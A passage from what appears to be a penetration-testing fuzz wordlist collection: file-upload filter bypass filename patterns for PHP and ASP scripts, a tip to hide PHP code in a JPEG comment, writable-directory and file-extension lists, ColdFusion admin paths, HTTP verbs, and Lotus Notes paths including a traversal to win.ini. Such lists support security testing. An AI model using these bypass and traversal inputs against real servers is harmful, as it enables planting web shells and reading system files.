# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
# also: use "gim" to create a .jpg image with the meta comment field set to:<br />
# -----<br />
#<?php phpinfo(); ?> <br />
#-----<br />
<br />
{PHPSCRIPT}<br />
{PHPSCRIPT}.phtml<br />
{PHPSCRIPT}.php.html<br />
{PHPSCRIPT}.php::$DATA<br />
{PHPSCRIPT}.php.php.rar <br />
{PHPSCRIPT}.php.rar<br />
{PHPSCRIPT}.php.doc<br />
{PHPSCRIPT}.php.xls<br />
{PHPSCRIPT}.php.xlsx<br />
{PHPSCRIPT}.php.pdf<br />
{PHPSCRIPT}.php.jpeg<br />
{PHPSCRIPT}.php.gif<br />
{PHPSCRIPT}.php.zip<br />
</pre><br />
<br />
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14) ===<br />
<pre># Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends (Update: 17 March 2009)<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
{ASPSCRIPT}<br />
{ASPSCRIPT};<br />
{ASPSCRIPT};.jpg<br />
{ASPSCRIPT};.pdf<br />
{ASPSCRIPT};.html<br />
{ASPSCRIPT};.htm<br />
{ASPSCRIPT};.txt<br />
{ASPSCRIPT};.xyz<br />
{ASPSCRIPT};.zip<br />
{ASPSCRIPT};.tgz<br />
{ASPSCRIPT};.doc<br />
{ASPSCRIPT};.docx<br />
{ASPSCRIPT};.xls<br />
{ASPSCRIPT};.xlsx<br />
</pre><br />
<br />
=== Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 10 April 2010 - Total Statements: 9) ===<br />
<pre>#Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 17 March 2010) <br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
{PREFIX}/templates_compiled/<br />
{PREFIX}/templates_c/<br />
{PREFIX}/templates/<br />
{PREFIX}/temporary/<br />
{PREFIX}/images/<br />
{PREFIX}/cache/<br />
{PREFIX}/temp/<br />
{PREFIX}/files/<br />
{PREFIX}/tmp/<br />
<br />
</pre><br />
<br />
=== Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863) ===<br />
<pre><br />
# Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
.$er<br />
.123<br />
.1pe<br />
.1ph<br />
.3dr<br />
.3dt<br />
.3me<br />
.3pe<br />
.4dl<br />
.4dv<br />
.8xk<br />
.^^^<br />
.a3l<br />
.a3m<br />
.a3w<br />
.a4l<br />
.a4m<br />
.a4w<br />
.a5l<br />
.a5w<br />
.a65<br />
.aao<br />
.ab<br />
.ab1<br />
.ab2<br />
.ab3<br />
.abcd<br />
.abi<br />
.abp<br />
.aby<br />
.aca<br />
.acc<br />
.accdb<br />
.acf<br />
.acg<br />
.ade<br />
.adp<br />
.adt<br />
.adx<br />
.aft<br />
.agd<br />
.aifb<br />
.alc<br />
.ald<br />
.ali<br />
.amb<br />
.amsorm<br />
.an1<br />
.anme<br />
.apr<br />
.arc<br />
.arh<br />
.ask<br />
.asm<br />
.ast<br />
.at5<br />
.att<br />
.aw<br />
.awg<br />
.azw<br />
.bafl<br />
.bci<br />
.bcm<br />
.bdf<br />
.bdic<br />
.bfx<br />
.bgl<br />
.bgt<br />
.bin<br />
.bjo<br />
.bk<br />
.bkk<br />
.blb<br />
.bld<br />
.blg<br />
.bok<br />
.box<br />
.brd<br />
.brw<br />
.btf<br />
.btif<br />
.btm<br />
.btr<br />
.cap<br />
.cat<br />
.cbg<br />
.cch<br />
.ccr<br />
.cct<br />
.cdb<br />
.cdd<br />
.cdf<br />
.cdp<br />
.cdr<br />
.cdx<br />
.cel<br />
.celtx<br />
.chg<br />
.chk<br />
.chn<br />
.ckd<br />
.ckt<br />
.cl2<br />
.cl4<br />
.clb<br />
.clix<br />
.clm<br />
.clp<br />
.cmbl<br />
.cna<br />
.contact<br />
.cpi<br />
.cpmz<br />
.crd<br />
.crtx<br />
.csa<br />
.csv<br />
.ctf<br />
.ctt<br />
.cursorfx<br />
.curxptheme<br />
.cvd<br />
.cvn<br />
.cwk<br />
.cws<br />
.cwz<br />
.cxt<br />
.cyo<br />
.cys<br />
.daf<br />
.dal<br />
.dam<br />
.das<br />
.dat<br />
.data<br />
.db<br />
.db2<br />
.db3<br />
.dbc<br />
.dbd<br />
.dbf<br />
.dbx<br />
.dcf<br />
.dcl<br />
.dcm<br />
.dcmd<br />
.ddc<br />
.ddcx<br />
.ddt<br />
.dem<br />
.des<br />
.dex<br />
.dfm<br />
.dfproj<br />
.dft<br />
.dgb<br />
.dif<br />
.dii<br />
.dlg<br />
.dm2<br />
.dmo<br />
.dmsk<br />
.dnc<br />
.dockzip<br />
.dp1<br />
.dpn<br />
.dpx<br />
.drl<br />
.dsb<br />
.dsd<br />
.dsk<br />
.dsy<br />
.dsz<br />
.dt0<br />
.dt1<br />
.dt2<br />
.dta<br />
.dtr<br />
.dvdproj<br />
.dvo<br />
.dwi<br />
.e00<br />
.eap<br />
.ebuild<br />
.ec0<br />
.eco<br />
.ecx<br />
.edb<br />
.edf<br />
.eep<br />
.efx<br />
.egp<br />
.emb<br />
.emd<br />
.emlxpart<br />
.enc<br />
.enw<br />
.epp<br />
.epub<br />
.epw<br />
.er1<br />
.esp<br />
.ess<br />
.est<br />
.esx<br />
.et<br />
.eta<br />
.etd<br />
.etl<br />
.ev<br />
.ev3<br />
.evt<br />
.evy<br />
.exif<br />
.exp<br />
.exx<br />
.fa<br />
.fasta<br />
.fbl<br />
.fcd<br />
.fcs<br />
.fdb<br />
.ffd<br />
.ffwp<br />
.fhc<br />
.fid<br />
.fil<br />
.flame<br />
.fll<br />
.flo<br />
.flp<br />
.flt<br />
.fm<br />
.fm5<br />
.fmp<br />
.fo<br />
.fob<br />
.fol<br />
.fop<br />
.fox<br />
.fp<br />
.fp3<br />
.fp4<br />
.fp5<br />
.fp7<br />
.frl<br />
.frm<br />
.fro<br />
.frx<br />
.fsb<br />
.fsc<br />
.ftm<br />
.ftw<br />
.gan<br />
.gbr<br />
.gc<br />
.gcx<br />
.gdb<br />
.ged<br />
.gedcom<br />
.gen<br />
.ggb<br />
.gml<br />
.gms<br />
.gno<br />
.gnp<br />
.gp3<br />
.gpi<br />
.gps<br />
.gpx<br />
.gra<br />
.grade<br />
.grf<br />
.grib<br />
.grk<br />
.grr<br />
.grv<br />
.gs<br />
.gst<br />
.gtp<br />
.gwk<br />
.gxl<br />
.hcc<br />
.hce<br />
.hci<br />
.hcp<br />
.hcr<br />
.hcu<br />
.hda<br />
.hdb<br />
.hdf<br />
.hdi<br />
.hdl<br />
.hif<br />
.hl<br />
.hml<br />
.hmt<br />
.hs2<br />
.hsk<br />
.hst<br />
.htg<br />
.huh<br />
.hyv<br />
.i5z<br />
.ib<br />
.ics<br />
.id2<br />
.idx<br />
.igc<br />
.ihx<br />
.ii<br />
.iif<br />
.img<br />
.imt<br />
.ink<br />
.inp<br />
.ins<br />
.ip<br />
.irock<br />
.irr<br />
.irx<br />
.isf<br />
.itdb<br />
.itl<br />
.itm<br />
.itn<br />
.itw<br />
.itx<br />
.ivt<br />
.iw<br />
.ixb<br />
.jasper<br />
.jdb<br />
.jef<br />
.jmp<br />
.jnt<br />
.job<br />
.joboptions<br />
.joined<br />
.jph<br />
.jrprint<br />
.jrxml<br />
.jude<br />
.kap<br />
.kdb<br />
.kid<br />
.kismac<br />
.kmz<br />
.kpf<br />
.kpp<br />
.kpr<br />
.kpx<br />
.kpz<br />
.l<br />
.l6t<br />
.laccdb<br />
.lbl<br />
.lbx<br />
.lcd<br />
.lcf<br />
.lcm<br />
.ldif<br />
.lex<br />
.lgc<br />
.lgf<br />
.lgh<br />
.lgi<br />
.lgl<br />
.lib<br />
.lif<br />
.livereg<br />
.liveupdate<br />
.lix<br />
.llb<br />
.lms<br />
.lmx<br />
.lnt<br />
.loc<br />
.lp7<br />
.lrf<br />
.lrs<br />
.lrx<br />
.lsf<br />
.lsl<br />
.lsp<br />
.lsr<br />
.lst<br />
.lsu<br />
.lvm<br />
.lw4<br />
.ly<br />
.m<br />
.mag<br />
.mai<br />
.map<br />
.masseffectprofile<br />
.mat<br />
.mbb<br />
.mbf<br />
.mbg<br />
.mbl<br />
.mbp<br />
.mbx<br />
.mc1<br />
.mc9<br />
.mcd<br />
.md<br />
.mdb<br />
.mdc<br />
.mdf<br />
.mdl<br />
.mdm<br />
.mdn<br />
.mdt<br />
.mdx<br />
.mdz<br />
.mem<br />
.menc<br />
.met<br />
.mex<br />
.mfo<br />
.mfp<br />
.mgc<br />
.mls<br />
.mm<br />
.mmap<br />
.mmc<br />
.mmf<br />
.mmp<br />
.mnc<br />
.mng<br />
.mnk<br />
.mno<br />
.mny<br />
.mobi<br />
.moho<br />
.mosaic<br />
.mox<br />
.mpd<br />
.mpj<br />
.mpp<br />
.mpt<br />
.mpx<br />
.mpz<br />
.mq4<br />
.ms10<br />
.mth<br />
.mtw<br />
.mud<br />
.muf<br />
.mw<br />
.mwf<br />
.mws<br />
.mwx<br />
.mxd<br />
.myd<br />
.myi<br />
.nb<br />
.nc<br />
.ndf<br />
.ndk<br />
.ndx<br />
.net<br />
.neta<br />
.nfo<br />
.nitf<br />
.nmind<br />
.not<br />
.notebook<br />
.np<br />
.npl<br />
.npt<br />
.nrl<br />
.ns2<br />
.ns3<br />
.ns4<br />
.nsf<br />
.ntx<br />
.numbers<br />
.nvl<br />
.nyf<br />
.oab<br />
.obj<br />
.odb<br />
.odf<br />
.odp<br />
.ods<br />
.odx<br />
.oeaccount<br />
.ofc<br />
.ofm<br />
.oft<br />
.ofx<br />
.omcs<br />
.omp<br />
.ond<br />
.one<br />
.oo3<br />
.opf<br />
.opx<br />
.or2<br />
.or3<br />
.or4<br />
.or5<br />
.or6<br />
.org<br />
.orx<br />
.otf<br />
.otl<br />
.otln<br />
.ots<br />
.out<br />
.ov2<br />
.ova<br />
.ovf<br />
.p96<br />
.p97<br />
.pab<br />
.paf<br />
.pan<br />
.pbd<br />
.pc<br />
.pcap<br />
.pcb<br />
.pcr<br />
.pd4<br />
.pd5<br />
.pdas<br />
.pdb<br />
.pdd<br />
.pdm<br />
.pds<br />
.pdx<br />
.peb<br />
.pec<br />
.pep<br />
.pex<br />
.pfc<br />
.pfl<br />
.phb<br />
.phm<br />
.pi<br />
.pis<br />
.pjx<br />
.pka<br />
.pkb<br />
.pkh<br />
.pks<br />
.pkt<br />
.pln<br />
.plw<br />
.pmo<br />
.pmr<br />
.pnproj<br />
.pnpt<br />
.pns<br />
.pnt<br />
.pod<br />
.poi<br />
.pos<br />
.postal<br />
.pot<br />
.potm<br />
.potx<br />
.pp2<br />
.ppf<br />
.pps<br />
.ppsx<br />
.ppt<br />
.pptm<br />
.pptx<br />
.prc<br />
.pre<br />
.prf<br />
.prj<br />
.prm<br />
.prs<br />
.psa<br />
.psf<br />
.psm<br />
.pst<br />
.ptb<br />
.ptf<br />
.ptk<br />
.ptm<br />
.ptn<br />
.ptt<br />
.ptz<br />
.pvl<br />
.pwd<br />
.pxj<br />
.pxl<br />
.q07<br />
.q08<br />
.q09<br />
.q3d<br />
.qbw<br />
.qdat<br />
.qdf<br />
.qdfm<br />
.qel<br />
.qfx<br />
.qif<br />
.qpb<br />
.qpf<br />
.qph<br />
.qpm<br />
.qpw<br />
.qrp<br />
.qsd<br />
.ral<br />
.rbt<br />
.rcd<br />
.rcg<br />
.rdb<br />
.rdf<br />
.rdx<br />
.ref<br />
.ret<br />
.rf1<br />
.rfa<br />
.rfo<br />
.rge<br />
.rgn<br />
.rgo<br />
.rmuf<br />
.rnq<br />
.rod<br />
.rog<br />
.roi<br />
.rou<br />
.rpp<br />
.rpt<br />
.rrt<br />
.rsc<br />
.rsd<br />
.rsw<br />
.rte<br />
.rvt<br />
.rwg<br />
.rzb<br />
.s85<br />
.saf<br />
.sam07<br />
.sar<br />
.sav<br />
.sbd<br />
.sbf<br />
.sbq<br />
.sbt<br />
.sca<br />
.scf<br />
.sch<br />
.sdb<br />
.sdc<br />
.sdf<br />
.sdp<br />
.sdq<br />
.sds<br />
.sen<br />
.seo<br />
.seq<br />
.ser<br />
.sgml<br />
.sgn<br />
.shp<br />
.shs<br />
.shx<br />
.skc<br />
.skv<br />
.skx<br />
.sle<br />
.slk<br />
.slp<br />
.snapfireshow<br />
.sonic<br />
.soundpack<br />
.spo<br />
.sps<br />
.spub<br />
.spv<br />
.sq<br />
.sqd<br />
.sql<br />
.sqlite<br />
.sqr<br />
.sta<br />
.stc<br />
.stf<br />
.stk<br />
.stl<br />
.stm<br />
.stp<br />
.str<br />
.stt<br />
.stw<br />
.styk<br />
.stykz<br />
.swk<br />
.sxc<br />
.sxi<br />
.sy3<br />
.t01<br />
.t02<br />
.t03<br />
.t04<br />
.t05<br />
.t06<br />
.t07<br />
.t08<br />
.t09<br />
.t2<br />
.t3001<br />
.tax2008<br />
.tax2009<br />
.tb<br />
.tbk<br />
.tbl<br />
.tcc<br />
.tcx<br />
.tda<br />
.tdl<br />
.tdm<br />
.tdt<br />
.te<br />
.te3<br />
.teacher<br />
.tef<br />
.tet<br />
.tfa<br />
.tfd<br />
.tfrd<br />
.tjp<br />
.tk3<br />
.tkfl<br />
.tmw<br />
.tol<br />
.topc<br />
.tpb<br />
.tps<br />
.tr3<br />
.tra<br />
.trd<br />
.trk<br />
.trs<br />
.trx<br />
.tst<br />
.tsv<br />
.ttk<br />
.txa<br />
.txd<br />
.txf<br />
.uccapilog<br />
.ud<br />
.udb<br />
.udeb<br />
.uds<br />
.ulf<br />
.ulz<br />
.update<br />
.upoi<br />
.usr<br />
.uvf<br />
.uwl<br />
.val<br />
.vbpf1<br />
.vcd<br />
.vce<br />
.vcf<br />
.vcs<br />
.vdb<br />
.vdx<br />
.vfs<br />
.vi<br />
.vip<br />
.vle<br />
.vlg<br />
.vmt<br />
.voi<br />
.vok<br />
.vrd<br />
.vscontent<br />
.vsx<br />
.vtx<br />
.vxml<br />
.w02<br />
.wab<br />
.wb1<br />
.wb2<br />
.wb3<br />
.wdb<br />
.wdq<br />
.wea<br />
.wfd<br />
.wfm<br />
.wgp<br />
.wgt<br />
.windowslivecontact<br />
.wjr<br />
.wk1<br />
.wk2<br />
.wk3<br />
.wk4<br />
.wk5<br />
.wke<br />
.wki<br />
.wks<br />
.wku<br />
.wlmp<br />
.wmdb<br />
.wor<br />
.wpc<br />
.wpf<br />
.wpo<br />
.wq1<br />
.wq2<br />
.wtb<br />
.wtr<br />
.xbk<br />
.xdb<br />
.xdp<br />
.xds<br />
.xef<br />
.xem<br />
.xfd<br />
.xfo<br />
.xft<br />
.xl<br />
.xlc<br />
.xlgc<br />
.xlr<br />
.xls<br />
.xlsb<br />
.xlsm<br />
.xlsx<br />
.xlt<br />
.xltm<br />
.xltx<br />
.xlw<br />
.xmcd<br />
.xml<br />
.xmlper<br />
.xmpz<br />
.xpg<br />
.xpj<br />
.xpm<br />
.xpt<br />
.xrp<br />
.xsl<br />
.xslt<br />
.xsn<br />
.xtm<br />
.xtp<br />
.xxd<br />
.yam<br />
.zap<br />
.zdb<br />
.zdc<br />
.zix<br />
.zmc<br />
.zpl<br />
.{pb<br />
.~hm<br />
</pre><br />
<br />
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===<br />
<pre><br />
# Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
<br />
.0<br />
.000<br />
.7z<br />
.a00<br />
.a01<br />
.a02<br />
.ace<br />
.ain<br />
.alz<br />
.apz<br />
.ar<br />
.arc<br />
.arh<br />
.ari<br />
.arj<br />
.ark<br />
.axx<br />
.b64<br />
.ba<br />
.bh<br />
.boo<br />
.bz<br />
.bz2<br />
.bzip<br />
.bzip2<br />
.c00<br />
.c01<br />
.c02<br />
.car<br />
.cb7<br />
.cbr<br />
.cbt<br />
.cbz<br />
.cp9<br />
.cpgz<br />
.cpt<br />
.dar<br />
.dd<br />
.deb<br />
.dgc<br />
.dist<br />
.ecs<br />
.efw<br />
.epi<br />
.f<br />
.fdp<br />
.gca<br />
.gz<br />
.gzi<br />
.gzip<br />
.ha<br />
.hbc<br />
.hbc2<br />
.hbe<br />
.hki<br />
.hki1<br />
.hki2<br />
.hki3<br />
.hpk<br />
.hyp<br />
.ice<br />
.ipg<br />
.ipk<br />
.ish<br />
.j<br />
.jar.pack<br />
.jgz<br />
.jic<br />
.kgb<br />
.lbr<br />
.lemon<br />
.lha<br />
.lnx<br />
.lqr<br />
.lz<br />
.lzh<br />
.lzm<br />
.lzma<br />
.lzo<br />
.lzx<br />
.md<br />
.mint<br />
.mou<br />
.mpkg<br />
.mzp<br />
.oar<br />
.p7m<br />
.pack.gz<br />
.package<br />
.pae<br />
.pak<br />
.paq6<br />
.paq7<br />
.paq8<br />
.par<br />
.par2<br />
.pbi<br />
.pcv<br />
.pea<br />
.pet<br />
.pf<br />
.pim<br />
.pit<br />
.piz<br />
.pkg<br />
.pup<br />
.puz<br />
.pwa<br />
.qda<br />
.r0<br />
.r00<br />
.r01<br />
.r02<br />
.r03<br />
.r1<br />
.r2<br />
.r30<br />
.rar<br />
.rev<br />
.rk<br />
.rnc<br />
.rp9<br />
.rpm<br />
.rte<br />
.rz<br />
.rzs<br />
.s00<br />
.s01<br />
.s02<br />
.s7z<br />
.sar<br />
.sdc<br />
.sdn<br />
.sea<br />
.sen<br />
.sfs<br />
.sfx<br />
.sh<br />
.shar<br />
.shk<br />
.shr<br />
.sit<br />
.sitx<br />
.spt<br />
.sqx<br />
.sqz<br />
.tar<br />
.tar.gz<br />
.tar.xz<br />
.taz<br />
.tbz<br />
.tbz2<br />
.tg<br />
.tgz<br />
.tlz<br />
.tlzma<br />
.txz<br />
.tz<br />
.uc2<br />
.uha<br />
.vem<br />
.vsi<br />
.wad<br />
.war<br />
.wot<br />
.xef<br />
.xez<br />
.xmcdz<br />
.xpi<br />
.xx<br />
.xz<br />
.y<br />
.yz<br />
.z<br />
.z01<br />
.z02<br />
.z03<br />
.z04<br />
.zap<br />
.zfsendtotarget<br />
.zip<br />
.zipx<br />
.zix<br />
.zoo<br />
.zpi<br />
.zz</pre><br />
<br />
=== Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) ===<br />
<pre><br />
# Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
<br />
.3me<br />
.3pe<br />
.4dl<br />
.8xk<br />
.^^^<br />
.aao<br />
.ab2<br />
.aca<br />
.accdb<br />
.acf<br />
.acg<br />
.agd<br />
.an1<br />
.anme<br />
.arc<br />
.arh<br />
.ast<br />
.att<br />
.aw<br />
.bafl<br />
.bdf<br />
.bfx<br />
.bjo<br />
.bld<br />
.blg<br />
.btf<br />
.btif<br />
.btr<br />
.cct<br />
.cdb<br />
.cdd<br />
.cdf<br />
.cdp<br />
.cdr<br />
.chk<br />
.ckd<br />
.cl2<br />
.cl4<br />
.clb<br />
.clix<br />
.clm<br />
.cmbl<br />
.contact<br />
.cpi<br />
.cpmz<br />
.csv<br />
.cwz<br />
.cxt<br />
.daf<br />
.dat<br />
.data<br />
.db<br />
.dcf<br />
.ddt<br />
.dex<br />
.dif<br />
.dmsk<br />
.dnc<br />
.dpx<br />
.dsd<br />
.dt1<br />
.dt2<br />
.dta<br />
.e00<br />
.ec0<br />
.edf<br />
.eep<br />
.efx<br />
.enc<br />
.enw<br />
.epw<br />
.est<br />
.et<br />
.eta<br />
.ev3<br />
.exif<br />
.exp<br />
.fbl<br />
.fdb<br />
.fid<br />
.fol<br />
.gdb<br />
.gen<br />
.gnp<br />
.gpi<br />
.gpx<br />
.hcp<br />
.hdf<br />
.hmt<br />
.hsk<br />
.htg<br />
.id2<br />
.ii<br />
.img<br />
.ink<br />
.ins<br />
.irr<br />
.irx<br />
.iw<br />
.jdb<br />
.jnt<br />
.job<br />
.jrprint<br />
.kmz<br />
.lbx<br />
.lex<br />
.lgf<br />
.lgl<br />
.lib<br />
.liveupdate<br />
.lnt<br />
.lst<br />
.m<br />
.masseffectprofile<br />
.mat<br />
.mbb<br />
.mdb<br />
.mem<br />
.menc<br />
.met<br />
.mmf<br />
.mng<br />
.mpd<br />
.mpp<br />
.ms10<br />
.muf<br />
.mw<br />
.mwf<br />
.mwx<br />
.nc<br />
.ndx<br />
.nfo<br />
.not<br />
.ns2<br />
.ns3<br />
.ns4<br />
.ntx<br />
.numbers<br />
.ods<br />
.oeaccount<br />
.omcs<br />
.or2<br />
.or3<br />
.or4<br />
.or5<br />
.orx<br />
.out<br />
.ov2<br />
.ovf<br />
.paf<br />
.pbd<br />
.pcr<br />
.pdb<br />
.pdx<br />
.peb<br />
.pec<br />
.pfc<br />
.pis<br />
.pln<br />
.pnpt<br />
.pns<br />
.pnt<br />
.pos<br />
.postal<br />
.pps<br />
.ppsx<br />
.ppt<br />
.pptm<br />
.pptx<br />
.pre<br />
.prf<br />
.psa<br />
.psf<br />
.pst<br />
.ptz<br />
.q07<br />
.q3d<br />
.qbw<br />
.qdat<br />
.qdf<br />
.qfx<br />
.qpf<br />
.qpw<br />
.qsd<br />
.rcd<br />
.rdx<br />
.ref<br />
.rmuf<br />
.roi<br />
.rrt<br />
.rvt<br />
.rwg<br />
.saf<br />
.sam07<br />
.sbd<br />
.sbf<br />
.sbq<br />
.sbt<br />
.sdb<br />
.sdc<br />
.sdf<br />
.sds<br />
.ser<br />
.sgn<br />
.shs<br />
.skc<br />
.slk<br />
.sonic<br />
.soundpack<br />
.spo<br />
.sql<br />
.stf<br />
.stl<br />
.stm<br />
.sy3<br />
.t08<br />
.t09<br />
.t2<br />
.tax2009<br />
.tdl<br />
.tdt<br />
.te<br />
.teacher<br />
.tmw<br />
.tol<br />
.trk<br />
.trs<br />
.trx<br />
.tsv<br />
.uccapilog<br />
.ud<br />
.udeb<br />
.uds<br />
.update<br />
.uwl<br />
.val<br />
.vcf<br />
.vdb<br />
.vfs<br />
.vip<br />
.vle<br />
.vlg<br />
.vxml<br />
.w02<br />
.wab<br />
.wb1<br />
.wb3<br />
.wdq<br />
.wfd<br />
.wfm<br />
.windowslivecontact<br />
.wk1<br />
.wk2<br />
.wk3<br />
.wk4<br />
.wk5<br />
.wke<br />
.wks<br />
.wlmp<br />
.wpc<br />
.wpo<br />
.wq1<br />
.wq2<br />
.wtr<br />
.xbk<br />
.xdb<br />
.xds<br />
.xfd<br />
.xl<br />
.xlgc<br />
.xlr<br />
.xls<br />
.xlsx<br />
.xltm<br />
.xltx<br />
.xml<br />
.xmpz<br />
.xsl<br />
.xsn<br />
.xtm<br />
.xtp<br />
.xxd<br />
.{pb<br />
.~hm<br />
</pre><br />
<br />
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===<br />
<pre><br />
# Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
<br />
CFIDE/Administrator/<br />
CFIDE/Administrator/index.cfm<br />
CFIDE/Administrator/login.cfm<br />
CFIDE/Administrator/Application.cfm<br />
CFIDE/Application.cfm<br />
CFIDE/adminapi/<br />
CFIDE/adminapi/Application.cfm<br />
CFIDE/adminapi/administrator.cfc<br />
CFIDE/adminapi/base.cfc<br />
CFIDE/adminapi/customtags/<br />
CFIDE/adminapi/customtags/l10n.cfm<br />
CFIDE/adminapi/customtags/resources<br />
CFIDE/adminapi/customtags/resources/<br />
CFIDE/adminapi/datasource.cfc<br />
CFIDE/adminapi/debugging.cfc<br />
CFIDE/adminapi/eventgateway.cfc<br />
CFIDE/adminapi/extensions.cfc<br />
CFIDE/adminapi/mail.cfc<br />
CFIDE/adminapi/runtime.cfc<br />
CFIDE/adminapi/security.cfc<br />
CFIDE/adminapi/_datasource/<br />
CFIDE/adminapi/_datasource/formatjdbcurl.cfm<br />
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm<br />
CFIDE/adminapi/_datasource/geturldefaults.cfm<br />
CFIDE/adminapi/_datasource/setdsn.cfm<br />
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm<br />
CFIDE/adminapi/_datasource/setsldatasource.cfm<br />
CFIDE/classes/<br />
CFIDE/classes/cf-j2re-win.cab<br />
CFIDE/classes/cfapplets.jar<br />
CFIDE/classes/images<br />
CFIDE/componentutils/<br />
CFIDE/componentutils/Application.cfm<br />
CFIDE/componentutils/cfcexplorer.cfc<br />
CFIDE/componentutils/cfcexplorer_utils.cfm<br />
CFIDE/componentutils/componentdetail.cfm<br />
CFIDE/componentutils/componentdoc.cfm<br />
CFIDE/componentutils/componentlist.cfm<br />
CFIDE/componentutils/gatewaymenu<br />
CFIDE/componentutils/gatewaymenu/<br />
CFIDE/componentutils/gatewaymenu/menu.cfc<br />
CFIDE/componentutils/gatewaymenu/menunode.cfc<br />
CFIDE/componentutils/login.cfm<br />
CFIDE/componentutils/packagelist.cfm<br />
CFIDE/componentutils/utils.cfc<br />
CFIDE/componentutils/_component_cfcToHTML.cfm<br />
CFIDE/componentutils/_component_cfcToMCDL.cfm?<br />
CFIDE/componentutils/_component_style.cfm<br />
CFIDE/componentutils/_component_utils.cfm<br />
CFIDE/debug/<br />
CFIDE/debug/images/<br />
CFIDE/debug/includes/<br />
CFIDE/images/<br />
CFIDE/images/skins/<br />
CFIDE/install.cfm<br />
CFIDE/installers/<br />
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp<br />
CFIDE/installers/CFReportBuilderInstaller.exe<br />
CFIDE/probe.cfm<br />
CFIDE/scripts/<br />
CFIDE/scripts/css/<br />
CFIDE/scripts/xsl/<br />
CFIDE/wizards/<br />
CFIDE/wizards/common/<br />
CFIDE/wizards/common/utils.cfc</pre><br />
<br />
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31) ===<br />
<pre><br />
# All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
<br />
OPTIONS<br />
GET<br />
HEAD<br />
POST<br />
PUT<br />
DELETE<br />
TRACE<br />
CONNECT<br />
PROPFIND<br />
PROPPATCH<br />
MKCOL<br />
COPY<br />
MOVE<br />
LOCK<br />
UNLOCK<br />
VERSION-CONTROL<br />
REPORT<br />
CHECKOUT<br />
CHECKIN<br />
UNCHECKOUT<br />
MKWORKSPACE<br />
UPDATE<br />
LABEL<br />
MERGE<br />
BASELINE-CONTROL<br />
MKACTIVITY<br />
ORDERPATCH<br />
ACL<br />
PATCH<br />
SEARCH<br />
ARBITRARY<br />
</pre><br />
<br />
=== Lotus/Notes Files - (Update: 02 February 2010 - Total Statements: 111) ===<br />
<pre>/852566C90012664F<br />
/admin4.nsf<br />
/admin5.nsf<br />
/admin.nsf<br />
/agentrunner.nsf<br />
/alog.nsf<br />
/a_domlog.nsf<br />
/bookmark.nsf<br />
/busytime.nsf<br />
/catalog.nsf<br />
/certa.nsf<br />
/certlog.nsf<br />
/certsrv.nsf<br />
/chatlog.nsf<br />
/clbusy.nsf<br />
/cldbdir.nsf<br />
/clusta4.nsf<br />
/collect4.nsf<br />
/da.nsf<br />
/dba4.nsf<br />
/dclf.nsf<br />
/DEASAppDesign.nsf<br />
/DEASLog01.nsf<br />
/DEASLog02.nsf<br />
/DEASLog03.nsf<br />
/DEASLog04.nsf<br />
/DEASLog05.nsf<br />
/DEASLog.nsf<br />
/decsadm.nsf<br />
/decslog.nsf<br />
/DEESAdmin.nsf<br />
/dirassist.nsf<br />
/doladmin.nsf<br />
/domadmin.nsf<br />
/domcfg.nsf<br />
/domguide.nsf<br />
/domlog.nsf<br />
/dspug.nsf<br />
/events4.nsf<br />
/events5.nsf<br />
/events.nsf<br />
/event.nsf<br />
/homepage.nsf<br />
/iNotes/Forms5.nsf/$DefaultNav<br />
/jotter.nsf<br />
/leiadm.nsf<br />
/leilog.nsf<br />
/leivlt.nsf<br />
/log4a.nsf<br />
/log.nsf<br />
/l_domlog.nsf<br />
/mab.nsf<br />
/mail10.box<br />
/mail1.box<br />
/mail2.box<br />
/mail3.box<br />
/mail4.box<br />
/mail5.box<br />
/mail6.box<br />
/mail7.box<br />
/mail8.box<br />
/mail9.box<br />
/mail.box<br />
/msdwda.nsf<br />
/mtatbls.nsf<br />
/mtstore.nsf<br />
/names.nsf<br />
/nntppost.nsf<br />
/nntp/nd000001.nsf<br />
/nntp/nd000002.nsf<br />
/nntp/nd000003.nsf<br />
/ntsync45.nsf<br />
/perweb.nsf<br />
/qpadmin.nsf<br />
/quickplace/quickplace/main.nsf<br />
/reports.nsf<br />
/sample/siregw46.nsf<br />
/schema50.nsf<br />
/setupweb.nsf<br />
/setup.nsf<br />
/smbcfg.nsf<br />
/smconf.nsf<br />
/smency.nsf<br />
/smhelp.nsf<br />
/smmsg.nsf<br />
/smquar.nsf<br />
/smsolar.nsf<br />
/smtime.nsf<br />
/smtpibwq.nsf<br />
/smtpobwq.nsf<br />
/smtp.box<br />
/smtp.nsf<br />
/smvlog.nsf<br />
/srvnam.htm<br />
/statmail.nsf<br />
/statrep.nsf<br />
/stauths.nsf<br />
/stautht.nsf<br />
/stconfig.nsf<br />
/stconf.nsf<br />
/stdnaset.nsf<br />
/stdomino.nsf<br />
/stlog.nsf<br />
/streg.nsf<br />
/stsrc.nsf<br />
/userreg.nsf<br />
/vpuserinfo.nsf<br />
/webadmin.nsf<br />
/web.nsf<br />
/.nsf/../winnt/win.ini<br />
/?Open <br />
</pre><br />
<br />
